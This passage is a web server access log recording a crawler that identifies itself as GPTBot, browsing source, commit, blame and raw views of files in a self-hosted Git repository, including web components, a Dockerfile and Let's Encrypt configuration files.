"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" +[17/Feb/2026:13:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" +[17/Feb/2026:13:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" +[17/Feb/2026:13:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" [Client 74.7.227.38] [Length 14954] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" +[17/Feb/2026:13:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 15338] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=split&whitespace=ignore-all" +[17/Feb/2026:13:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" +[17/Feb/2026:13:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" +[17/Feb/2026:13:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" +[17/Feb/2026:13:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" +[17/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" +[17/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" +[17/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11403] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" +[17/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest%2fimport%20sys.py" [Client 74.7.227.38] [Length 25217] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" +[17/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10466] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" +[17/Feb/2026:13:22:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/" +[17/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata" [Client 74.7.227.38] [Length 303075] [Gzip 13.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13869] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" +[17/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13868] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" +[17/Feb/2026:13:22:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" +[17/Feb/2026:13:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13868] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" +[17/Feb/2026:13:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.patch" [Client 74.7.227.38] [Length 211699100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" +[17/Feb/2026:13:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" +[17/Feb/2026:13:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" +[17/Feb/2026:13:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10466] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" +[17/Feb/2026:13:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10827] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 74.7.227.38] [Length 11579] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13651] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" +[17/Feb/2026:13:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13651] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" +[17/Feb/2026:13:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" +[17/Feb/2026:13:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13649] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" +[17/Feb/2026:13:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" +[17/Feb/2026:13:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" +[17/Feb/2026:13:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" +[17/Feb/2026:13:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" +[17/Feb/2026:13:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" +[17/Feb/2026:13:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" +[17/Feb/2026:13:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" +[17/Feb/2026:13:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 74.7.227.38] [Length 10761] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" +[17/Feb/2026:13:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" +[17/Feb/2026:13:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9848] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" +[17/Feb/2026:13:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42172] [Gzip 12.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11687] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" +[17/Feb/2026:13:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11710] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" +[17/Feb/2026:13:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11711] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" +[17/Feb/2026:13:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11712] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" +[17/Feb/2026:13:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11703] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" +[17/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx" [Client 74.7.227.38] [Length 10141] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx" +[17/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" [Client 74.7.227.38] [Length 12578] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12175] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10332] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project" +[17/Feb/2026:13:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10515] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" +[17/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:13:23:40 +0000] - 200 200 - GET https 